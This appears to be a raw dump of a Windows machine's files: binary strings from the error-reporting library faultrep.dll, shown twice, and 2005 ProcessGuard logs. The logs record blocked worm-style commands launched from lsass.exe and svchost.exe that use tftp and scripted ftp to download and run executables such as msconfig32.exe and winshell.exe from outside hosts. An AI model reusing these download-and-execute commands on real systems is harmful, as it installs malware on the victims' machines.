2 $°f·ô näô näô näô oäV nä $wäç näô näö nä $.äõ nä $Qäõ näc$+äõ nä.$säý nä $Säõ näRichô näPEL úm=à! è6Ei0 ƒ @ö¼ ”æÈà H ° € Ä¨ .textüçè `.dataLì@À.rsrcà î@@.reloc¼ ú@B(úm=Xbúm=núm=z"úm=…úm=’(úm=Ÿ(úm=X(úm=¬(úm=·ntdll.dllVERSION.dllUSERENV.dllWINSTA.dllWTSAPI32.dllSETUPAPI.dllKERNEL32.dllUSER32.dllADVAPI32.dll¦JÝwv*Ýw¹0ÝwS0Ýw{ Ýw› ÝwÍ0Ýwí0Ýwo0Ýw; Ýw› Þwk!Ýwñ!ÝwanÝw !Ýw:PÝw9 Þw Þwg Þw 0Ýw 0Ýw aÝwÍ/Ýwí/Ýw¡2Ýw…2Ýwé¸Ýw® ÝwØ Ýw ÝwôlÞwÅ`ÞwíGÝw‹ Ýw‹ Ýw$-Ýw(7ÝwØ Ýw¤¶çw õwð¦çw#.çwü§çwk õw·çw` çw7^çwÂ8éwü=éw õw:ñçw.ðçw©¬çw æw‘°çw=Òæw28éw,éwÑ.éwéhçw4çw ¬çwß§çw¡ õwúhçwL¤çw“_çw›¢çwŽ æw0ïçwªaçwC¥çw¶ïçw¹æçwÅ¶çwåMçw ·çwá èw¿çwÑŠçw² èwj èwwUçwbdçw9ØçwŒæçw2³çw²Óçw-¡æwK6éwVMéw 5éw›Xçwâ/æw° çw- çw‹°çwRáæwîçw>içwbëçwdËæwtÝçwE§çwV÷wÞU÷w÷:çw—áçwÊ%õw€—æwd èw´>éw$6çw…YçwCMçw Içw•ÙçwöæwI©çwÜ:gveXgv[Wgv¯dgvÝGÔwNÖwR®ÔwÈ½Ôwã¦ÔwÎmÔw `ÔwÐGÔwŠ §uÓD§uëëðêr 6vU 6v{ 6võv# õvD öwL0õw›Ûõw|0õwH öw¦¼öwµùõwˆvõwª-õwN.õw°÷wìaõwty÷w 'õwª&õwû öwö õwty÷w´ õwþõw±Øm=ü5ü)Kernel faultUnplanned shutdownUnknown event\8 EiSoftware\Microsoft\PCHealth\ErrorReporting\ExclusionListunknownÿÿÿÿõ6Eiû6Eiÿÿÿÿ18Ei78EiApplication HangWINDOWSappcompat.txt.mdmpmanifest.txterrorlog.loghungappdumprep.exedwwin.exe%02d-%02d-%04d %02d:%02d:%02d Hang fault for %ls
3 ÿÿÿÿá;Eiç;Eiÿÿÿÿ<Ei‡<Eiÿÿÿÿ @Ei @Eiwatson.microsoft.comofficewatsonSystemSetupInProgressSystem\Setuperrorlog.logDebuggerAutoSOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebugUserFaultCheck%systemroot%\system32\dumprep 0 -uSOFTWARE\Microsoft\Windows\CurrentVersion\RunSOFTWARE\Microsoft\PCHealth\ErrorReporting\UserFaults%ls.%04d%02d%02d-%02d%02d%02d-00.mdmpPCHealth\ErrorRep\UserDumps\WINDOWS.mdmpGlobal\4FCC0DEFE22C4f138FB9D5AF25FD9398˜ Ei@ Eimanifest.txt%ls\dwwin.exe -x -s %luappcompat.txtHKLM\Software\Microsoft\Windows NT\CurrentVersion\DigitalProductIdWINDOWSMicrosoft\PCHealth\ErrorReporting\DWSoftware\Microsoft\PCHealth\ErrorReportingMaxUserQueueSize\\.\pipe\PCHFaultRepExecPipeÿÿÿÿ GEi GEiÿÿÿÿ IEi"IEiÿÿÿÿµIEi»IEiÿÿÿÿ KEi KEiWinsta0\DefaultÿÿÿÿTSEiZSEiÿÿÿÿ&ZEi*ZEiÿÿÿÿ±\Ei·\EiÿÿÿÿG]EiM]Eiÿÿÿÿ&_Ei,_Eiÿÿÿÿ6`Ei<`Eiÿÿÿÿ—cEicEiÿÿÿÿÆfEiÌfEi%02d-%02d-%04d %02d:%02d:%02d User fault %08x in %ls
4 ÿÿÿÿ8mEiImEiSystem ErrorApplication ErrorApplication Hang%ls\dwwin.exe -d %lsErrorSubPath=Heap=DataFiles=Stage2URL=Stage1URL=EventLogSource=NoReportButton=ReportButton=Plea=HeaderText=ErrorText=RegSubPath=Microsoft\PCHealth\ErrorReporting\DWDigPidRegPath=HKLM\Software\Microsoft\Windows NT\CurrentVersion\DigitalProductIdServer=%lsUI LCID=%dFlags=%dBrand=%lsTitleName=watson.microsoft.comofficewatsonWINDOWS.hdmp.mdmp\dbghelp.dll%ls\dumprep.exe %ld -dm 7 7 %ls %I64d%ls\%d.%d.%d.%d\%ls\%d.%d.%d.%d\%08xStage2URL=/dw/stagetwo.asp?szAppName=%ls&szAppVer=%d.%d.%d.%d&szModName=%ls&szModVer=%d.%d.%d.%d&offset=%08xStage1URL=/StageOne/%ls/%d_%d_%d_%d/%ls/%d_%d_%d_%d/%08x.htmÿÿÿÿºmEi¾mEiGetModuleFileNameExWpsapi.dllÿÿÿÿ qEi qEi\kernel32.dllSdbGrabMatchingInfo\apphelp.dllÿÿÿÿ rEi&rEiÿÿÿÿ“rEi™rEiÿÿÿÿSsEiWsEiÿÿÿÿ§sEi«sEiÿÿÿÿ tEi tEiÿÿÿÿ8tEi<tEiMiniDumpWriteDumpÿÿÿÿRyEiVyEiÿÿÿÿ zEi zEiÿÿÿÿ°}Ei¶}Eiÿÿÿÿ˜~Eiž~Eiÿÿÿÿ Ei#EiÿÿÿÿK€EiQ€EiDWMÿÿÿÿÇŠEiÍŠEiwinsta0ÿÿÿÿmEiqEiÿÿÿÿ|‘Ei‚‘EiWinSta0ÿÿÿÿL“EiR“Eiÿÿÿÿ³”Ei¹”EiÿÿÿÿQ•EiW•EiApplication Hang %S %S in %S %S at offset %S%08x%016I64x%d.%d.%d.%dApplication Failure %S %S in %S %S at offset %SSystem Error Error code %S Parameters %S, %S, %S, %SInternalNameFileDescriptionProductNameCompanyName\StringFileInfo\%04x%04x\FileVersion\VarFileInfo\Translation0.0.0.0ÿÿÿÿ Ei EiõœEiûœEiÿÿÿÿì¡Eiò¡Eiÿÿÿÿi¢Eio¢EishutdownStage2URL=/dw/ShutdownTwo.asp?OSVer=%d_%d_%d&SP=%d_%d&Product=%d_%dblueWINDOWSStage2URL=/dw/bluetwo.asp?BCCode=%x&BCP1=%p&BCP2=%p&BCP3=%p&BCP4=%p&OSVer=%d_%d_%d&SP=%d_%d&Product=%d_%dsysdata.xmlmanifest.txtSystemSetupInProgressSystem\Setup%systemroot%\system32\dumprep 0 -kKernelFaultCheck%systemroot%\system32\dumprep 0 -sShutdownEventCheckSOFTWARE\Microsoft\Windows\CurrentVersion\RunSOFTWARE\Microsoft\PCHealth\ErrorReporting\KernelFaultsSOFTWARE\Microsoft\PCHealth\ErrorReporting\ShutdownEventsUnknown eventKernel faultUnplanned shutdownè(Ei )EiÌ(Eierrorlog.log\dumprep 0 -sg\dumprep 0 -kg</DRIVERS></SYSTEMINFO><DRIVERS></DEVICES><DEVICES></SYSTEM><?xml version="1.0" encoding="Unicode" ?><SYSTEMINFO><SYSTEM> <OSNAME>%ls %ls</OSNAME> <OSVER>%d.%d.%d %d.%d</OSVER> <OSLANGUAGE>%d</OSLANGUAGE>ProductNameSOFTWARE\Microsoft\Windows NT\CurrentVersionImagePathTypeSystem\CurrentControlSet\Services</PRODUCTNAME> </DRIVER></MANUFACTURER> <PRODUCTNAME></VERSION> <MANUFACTURER></FILENAME> <FILESIZE>%d</FILESIZE> <CREATIONDATE>%02d-%02d-%04d %02d:%02d:%02d</CREATIONDATE> <VERSION> <DRIVER> <FILENAME> </DEVICE></DRIVER> <DRIVER></SERVICE> <SERVICE></HARDWAREID> <HARDWAREID></DESCRIPTION> <DESCRIPTION> <DEVICE>"&'<>\*ÿÿÿÿÊ©EiÐ©EidriversÿÿÿÿùªEiÿªEiÿÿÿÿ"¬Ei(¬Eiÿÿÿÿ¨®Ei®®Eiÿÿÿÿ ¯Ei ¯EiServerCommunications ServerSmall Business Server (restricted)Small Business ServerBack Office ServerWeb ServerAdvanced ServerDataCenter ServerProfessionalHome EditionEmbedded ÿÿÿÿr·Eix·Ei%02d-%02d-%04d %02d:%02d:%02d (reporting) %ls

C:\WINDOWS\SYSTEM32\dllcache\faultrep.dll (65 KB, 31/03/2003 12:00:00)
2 $°f·ô näô näô näô oäV nä $wäç näô näö nä $.äõ nä $Qäõ näc$+äõ nä.$säý nä $Säõ näRichô näPEL úm=à! è6Ei0 ƒ @ö¼ ”æÈà H ° € Ä¨ .textüçè `.dataLì@À.rsrcà î@@.reloc¼ ú@B(úm=Xbúm=núm=z"úm=…úm=’(úm=Ÿ(úm=X(úm=¬(úm=·ntdll.dllVERSION.dllUSERENV.dllWINSTA.dllWTSAPI32.dllSETUPAPI.dllKERNEL32.dllUSER32.dllADVAPI32.dll¦JÝwv*Ýw¹0ÝwS0Ýw{ Ýw› ÝwÍ0Ýwí0Ýwo0Ýw; Ýw› Þwk!Ýwñ!ÝwanÝw !Ýw:PÝw9 Þw Þwg Þw 0Ýw 0Ýw aÝwÍ/Ýwí/Ýw¡2Ýw…2Ýwé¸Ýw® ÝwØ Ýw ÝwôlÞwÅ`ÞwíGÝw‹ Ýw‹ Ýw$-Ýw(7ÝwØ Ýw¤¶çw õwð¦çw#.çwü§çwk õw·çw` çw7^çwÂ8éwü=éw õw:ñçw.ðçw©¬çw æw‘°çw=Òæw28éw,éwÑ.éwéhçw4çw ¬çwß§çw¡ õwúhçwL¤çw“_çw›¢çwŽ æw0ïçwªaçwC¥çw¶ïçw¹æçwÅ¶çwåMçw ·çwá èw¿çwÑŠçw² èwj èwwUçwbdçw9ØçwŒæçw2³çw²Óçw-¡æwK6éwVMéw 5éw›Xçwâ/æw° çw- çw‹°çwRáæwîçw>içwbëçwdËæwtÝçwE§çwV÷wÞU÷w÷:çw—áçwÊ%õw€—æwd èw´>éw$6çw…YçwCMçw Içw•ÙçwöæwI©çwÜ:gveXgv[Wgv¯dgvÝGÔwNÖwR®ÔwÈ½Ôwã¦ÔwÎmÔw `ÔwÐGÔwŠ §uÓD§uëëðêr 6vU 6v{ 6võv# õvD öwL0õw›Ûõw|0õwH öw¦¼öwµùõwˆvõwª-õwN.õw°÷wìaõwty÷w 'õwª&õwû öwö õwty÷w´ õwþõw±Øm=ü5ü)Kernel faultUnplanned shutdownUnknown event\8 EiSoftware\Microsoft\PCHealth\ErrorReporting\ExclusionListunknownÿÿÿÿõ6Eiû6Eiÿÿÿÿ18Ei78EiApplication HangWINDOWSappcompat.txt.mdmpmanifest.txterrorlog.loghungappdumprep.exedwwin.exe%02d-%02d-%04d %02d:%02d:%02d Hang fault for %ls
3 ÿÿÿÿá;Eiç;Eiÿÿÿÿ<Ei‡<Eiÿÿÿÿ @Ei @Eiwatson.microsoft.comofficewatsonSystemSetupInProgressSystem\Setuperrorlog.logDebuggerAutoSOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebugUserFaultCheck%systemroot%\system32\dumprep 0 -uSOFTWARE\Microsoft\Windows\CurrentVersion\RunSOFTWARE\Microsoft\PCHealth\ErrorReporting\UserFaults%ls.%04d%02d%02d-%02d%02d%02d-00.mdmpPCHealth\ErrorRep\UserDumps\WINDOWS.mdmpGlobal\4FCC0DEFE22C4f138FB9D5AF25FD9398˜ Ei@ Eimanifest.txt%ls\dwwin.exe -x -s %luappcompat.txtHKLM\Software\Microsoft\Windows NT\CurrentVersion\DigitalProductIdWINDOWSMicrosoft\PCHealth\ErrorReporting\DWSoftware\Microsoft\PCHealth\ErrorReportingMaxUserQueueSize\\.\pipe\PCHFaultRepExecPipeÿÿÿÿ GEi GEiÿÿÿÿ IEi"IEiÿÿÿÿµIEi»IEiÿÿÿÿ KEi KEiWinsta0\DefaultÿÿÿÿTSEiZSEiÿÿÿÿ&ZEi*ZEiÿÿÿÿ±\Ei·\EiÿÿÿÿG]EiM]Eiÿÿÿÿ&_Ei,_Eiÿÿÿÿ6`Ei<`Eiÿÿÿÿ—cEicEiÿÿÿÿÆfEiÌfEi%02d-%02d-%04d %02d:%02d:%02d User fault %08x in %ls
4 ÿÿÿÿ8mEiImEiSystem ErrorApplication ErrorApplication Hang%ls\dwwin.exe -d %lsErrorSubPath=Heap=DataFiles=Stage2URL=Stage1URL=EventLogSource=NoReportButton=ReportButton=Plea=HeaderText=ErrorText=RegSubPath=Microsoft\PCHealth\ErrorReporting\DWDigPidRegPath=HKLM\Software\Microsoft\Windows NT\CurrentVersion\DigitalProductIdServer=%lsUI LCID=%dFlags=%dBrand=%lsTitleName=watson.microsoft.comofficewatsonWINDOWS.hdmp.mdmp\dbghelp.dll%ls\dumprep.exe %ld -dm 7 7 %ls %I64d%ls\%d.%d.%d.%d\%ls\%d.%d.%d.%d\%08xStage2URL=/dw/stagetwo.asp?szAppName=%ls&szAppVer=%d.%d.%d.%d&szModName=%ls&szModVer=%d.%d.%d.%d&offset=%08xStage1URL=/StageOne/%ls/%d_%d_%d_%d/%ls/%d_%d_%d_%d/%08x.htmÿÿÿÿºmEi¾mEiGetModuleFileNameExWpsapi.dllÿÿÿÿ qEi qEi\kernel32.dllSdbGrabMatchingInfo\apphelp.dllÿÿÿÿ rEi&rEiÿÿÿÿ“rEi™rEiÿÿÿÿSsEiWsEiÿÿÿÿ§sEi«sEiÿÿÿÿ tEi tEiÿÿÿÿ8tEi<tEiMiniDumpWriteDumpÿÿÿÿRyEiVyEiÿÿÿÿ zEi zEiÿÿÿÿ°}Ei¶}Eiÿÿÿÿ˜~Eiž~Eiÿÿÿÿ Ei#EiÿÿÿÿK€EiQ€EiDWMÿÿÿÿÇŠEiÍŠEiwinsta0ÿÿÿÿmEiqEiÿÿÿÿ|‘Ei‚‘EiWinSta0ÿÿÿÿL“EiR“Eiÿÿÿÿ³”Ei¹”EiÿÿÿÿQ•EiW•EiApplication Hang %S %S in %S %S at offset %S%08x%016I64x%d.%d.%d.%dApplication Failure %S %S in %S %S at offset %SSystem Error Error code %S Parameters %S, %S, %S, %SInternalNameFileDescriptionProductNameCompanyName\StringFileInfo\%04x%04x\FileVersion\VarFileInfo\Translation0.0.0.0ÿÿÿÿ Ei EiõœEiûœEiÿÿÿÿì¡Eiò¡Eiÿÿÿÿi¢Eio¢EishutdownStage2URL=/dw/ShutdownTwo.asp?OSVer=%d_%d_%d&SP=%d_%d&Product=%d_%dblueWINDOWSStage2URL=/dw/bluetwo.asp?BCCode=%x&BCP1=%p&BCP2=%p&BCP3=%p&BCP4=%p&OSVer=%d_%d_%d&SP=%d_%d&Product=%d_%dsysdata.xmlmanifest.txtSystemSetupInProgressSystem\Setup%systemroot%\system32\dumprep 0 -kKernelFaultCheck%systemroot%\system32\dumprep 0 -sShutdownEventCheckSOFTWARE\Microsoft\Windows\CurrentVersion\RunSOFTWARE\Microsoft\PCHealth\ErrorReporting\KernelFaultsSOFTWARE\Microsoft\PCHealth\ErrorReporting\ShutdownEventsUnknown eventKernel faultUnplanned shutdownè(Ei )EiÌ(Eierrorlog.log\dumprep 0 -sg\dumprep 0 -kg</DRIVERS></SYSTEMINFO><DRIVERS></DEVICES><DEVICES></SYSTEM><?xml version="1.0" encoding="Unicode" ?><SYSTEMINFO><SYSTEM> <OSNAME>%ls %ls</OSNAME> <OSVER>%d.%d.%d %d.%d</OSVER> <OSLANGUAGE>%d</OSLANGUAGE>ProductNameSOFTWARE\Microsoft\Windows NT\CurrentVersionImagePathTypeSystem\CurrentControlSet\Services</PRODUCTNAME> </DRIVER></MANUFACTURER> <PRODUCTNAME></VERSION> <MANUFACTURER></FILENAME> <FILESIZE>%d</FILESIZE> <CREATIONDATE>%02d-%02d-%04d %02d:%02d:%02d</CREATIONDATE> <VERSION> <DRIVER> <FILENAME> </DEVICE></DRIVER> <DRIVER></SERVICE> <SERVICE></HARDWAREID> <HARDWAREID></DESCRIPTION> <DESCRIPTION> <DEVICE>"&'<>\*ÿÿÿÿÊ©EiÐ©EidriversÿÿÿÿùªEiÿªEiÿÿÿÿ"¬Ei(¬Eiÿÿÿÿ¨®Ei®®Eiÿÿÿÿ ¯Ei ¯EiServerCommunications ServerSmall Business Server (restricted)Small Business ServerBack Office ServerWeb ServerAdvanced ServerDataCenter ServerProfessionalHome EditionEmbedded ÿÿÿÿr·Eix·Ei%02d-%02d-%04d %02d:%02d:%02d (reporting) %ls

C:\Program Files\ProcessGuard\logs\pglog_08_2005.txt (1261 KB, 31/08/2005 20:52:00)
0 [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds5b2b862b70f37c4dbf67c67390c07da4 ]Mon 08 - 21:24:24 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds57457864364a214fabff9a60bd5ef97e ]Mon 08 - 21:25:03 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Mon 08 - 21:26:54 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c tftp -i 10.1.0.45 get msnupdates.exe&start msnupdates.exe&exit ]Mon 08 - 21:28:55 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ cmd ]Mon 08 - 21:54:25 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1684 -h 1696 "global\01c91f73f841019c1ac" ]Mon 08 - 21:54:25 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds6380df6412c09e4bb6b97e441551afde ]Mon 08 - 21:54:25 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsac55cc3b4bb3c6478175f23cadf0f8c9 ]Mon 08 - 21:54:34 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [848] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]Mon 08 - 21:54:36 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Mon 08 - 21:56:04 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]Mon 08 - 21:56:08 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [652] [EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]Mon 08 - 21:57:09 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [2008] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]Mon 08 - 21:57:44 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avginet.exe" [1464] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /update "c:\documents and settings\all users\application data\grisoft\avg7data\avg7upd\install\u-fwd.idx" ]Mon 08 - 21:58:07 [EXECUTION] "c:\program files\grisoft\avg free\avgwb.dat" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [2008] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgwb.dat" /switchui ]Mon 08 - 21:59:19 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Mon 08 - 22:10:05 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]---Process Guard Log Started---Wed 10 - 16:39:50 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Wed 10 - 16:39:51 [EXECUTION] "
0 [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds55e3ee1818e6574094c9c6d2613b5733 ]Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds3826709400a7474eba07c3cc8f09a8fd ]Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds173914a66e43e7438818165a583c411f ]Wed 10 - 21:19:35 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]Wed 10 - 21:19:38 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [652] [EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]Wed 10 - 21:20:43 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ tftp.exe -i 202.124.151.118 get msconfig32.exe ]Wed 10 - 21:20:58 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 932 -h 1944 "global\05d5973f841819c79c" ]Wed 10 - 21:21:02 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 932 -h 1944 "global\05dfc83f841819c1ac" ]Wed 10 - 21:21:13 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [2008] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]Wed 10 - 21:21:24 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c echo open redirect.toruncity.biz 5192 >socket64.dll &echo user http http >>socket64.dll &echo binary >>socket64.dll &echo get >>socket64.dll &echo o.exe >>socket64.dll &echo o.exe >>socket64.dll &echo bye >>socket64.dll &ftp.exe -n -s:socket64.dll &del socket64.dll &o.exe ]Wed 10 - 21:43:00 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]Wed 10 - 21:43:29 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1052]---Process Guard Log Started---Wed 10 - 21:44:34 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Wed 10 - 21:44:34 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1300] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Wed 10 - 21:44:35 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Wed 10 - 21:44:37 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Wed 10 - 21:44:37 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]Wed 10 - 21:44:38 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]Wed 10 - 21:44:38 [EXECUTION] "c:
0 l\u-fwd.idx" ]Fri 12 - 20:42:03 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd ]Fri 12 - 20:42:50 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ tftp.exe -i 202.124.159.134 get msconfig32.exe ]Fri 12 - 20:43:49 [EXECUTION] "c:\windows\system32\taskmgr.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432] [EXECUTION] Commandline - [ taskmgr.exe ]Fri 12 - 20:44:56 [EXECUTION] "c:\windows\system32\taskmgr.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432] [EXECUTION] Commandline - [ taskmgr.exe ]Fri 12 - 20:54:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" shell32.dll,control_rundll "c:\windows\system32\appwiz.cpl",add or remove programs ]Fri 12 - 20:54:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" shell32.dll,control_rundll "c:\windows\system32\appwiz.cpl",add or remove programs ]Fri 12 - 21:03:59 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /k echo open 202.124.147.59 26256 > o&echo user 1 1 >> o &echo get winshell.exe >> o &echo quit >> o &ftp -n -s:o &del /f /q o &winshell.exe ]Fri 12 - 21:04:40 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 780 -h 756 "global\01c32813ec468198554" ]Fri 12 - 21:04:54 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [608] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]Fri 12 - 21:05:04 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]Fri 12 - 21:05:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds622b120e90904f43ba58b4f14b52036c ]Fri 12 - 21:05:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds194505682353974ab532df7982222e75 ]---Process Guard Log Started---Fri 12 - 21:06:53 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Fri 12 - 21:06:53 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1284] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Fri 12 - 21:06:54 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Fri 12 - 21:06:56 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ 